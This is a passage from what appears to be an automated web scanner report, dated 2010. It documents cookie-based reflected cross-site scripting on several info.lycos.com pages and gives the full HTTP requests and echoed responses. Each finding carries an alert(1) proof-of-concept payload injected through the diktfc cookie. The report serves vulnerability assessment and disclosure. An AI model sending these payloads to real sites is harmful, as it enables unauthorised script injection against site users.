P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Comp
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/overview.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afe78f";alert(1)//0ed3ac7046c.lycos.com"
});
</script>
...[SNIP]...

1.346. http://info.lycos.com/overview.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /overview.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4900"><script>alert(1)</script>bf225484b1b was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /overview.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad4900"><script>alert(1)</script>bf225484b1b; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Comp
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/overview.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad4900"><script>alert(1)</script>bf225484b1b.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.347. http://info.lycos.com/privacy.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /privacy.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1672b"><script>alert(1)</script>2b55e5b0452 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1672b"><script>alert(1)</script>2b55e5b0452; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/privacy.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1672b"><script>alert(1)</script>2b55e5b0452.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.348. http://info.lycos.com/privacy.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /privacy.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ad88"%3balert(1)//e21d1919c06 was submitted in the diktfc cookie. This input was echoed as 8ad88";alert(1)//e21d1919c06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ad88"%3balert(1)//e21d1919c06; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/privacy.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ad88";alert(1)//e21d1919c06.lycos.com"
});
</script>
...[SNIP]...

1.349. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /privacy/privacy.asp

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 190dd"%3balert(1)//7b5dcd82c26 was submitted in the diktfc cookie. This input was echoed as 190dd";alert(1)//7b5dcd82c26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/privacy.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A190dd"%3balert(1)//7b5dcd82c26; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/privacy.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A190dd";alert(1)//7b5dcd82c26.lycos.com"
});
</script>
...[SNIP]...

1.350. http://info.lycos.com/privacy/privacy.asp [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /privacy/privacy.asp

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ccb"><script>alert(1)</script>3bab4915179 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy/privacy.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0ccb"><script>alert(1)</script>3bab4915179; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/privacy.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0ccb"><script>alert(1)</script>3bab4915179.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.351. http://info.lycos.com/safety.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /safety.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dea5e"%3balert(1)//10d048cbf08 was submitted in the diktfc cookie. This input was echoed as dea5e";alert(1)//10d048cbf08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /safety.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea5e"%3balert(1)//10d048cbf08; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:08 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Inte
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/safety.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea5e";alert(1)//10d048cbf08.lycos.com"
});
</script>
...[SNIP]...

1.352. http://info.lycos.com/safety.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /safety.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79c2f"><script>alert(1)</script>32286124176 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /safety.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A79c2f"><script>alert(1)</script>32286124176; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:08 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Inte
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/safety.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A79c2f"><script>alert(1)</script>32286124176.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.353. http://info.lycos.com/tos-mail.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-mail.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e0f"><script>alert(1)</script>4ca13e64715 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos-mail.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8e0f"><script>alert(1)</script>4ca13e64715; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos-mail.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8e0f"><script>alert(1)</script>4ca13e64715.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.354. http://info.lycos.com/tos-mail.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-mail.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab42"%3balert(1)//34b92340f39 was submitted in the diktfc cookie. This input was echoed as 1ab42";alert(1)//34b92340f39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos-mail.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1ab42"%3balert(1)//34b92340f39; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Lyco
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos-mail.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1ab42";alert(1)//34b92340f39.lycos.com"
});
</script>
...[SNIP]...

1.355. http://info.lycos.com/tos-po.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-po.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2aec"%3balert(1)//4b5345f7ccc was submitted in the diktfc cookie. This input was echoed as b2aec";alert(1)//4b5345f7ccc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos-po.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab2aec"%3balert(1)//4b5345f7ccc; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Gene
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/tos-po.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab2aec";alert(1)//4b5345f7ccc.lycos.com"
});
</script>
...[SNIP]...

1.356. http://info.lycos.com/tos-po.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-po.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d9f"><script>alert(1)</script>c04828e62ab was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tos-po.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7d9f"><script>alert(1)</script>c04828e62ab; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Gene
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/tos-po.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7d9f"><script>alert(1)</script>c04828e62ab.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.357. http://info.lycos.com/tos-subs.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /tos-subs.php

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f28"%3balert(1)//65e76e87880 was submitted in the diktfc cookie. This input was echoed as 28f28";alert(1)//65e76e87880 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos-subs.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A28f28"%3balert(1)//65e76e87880; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:24 GMT; path=/
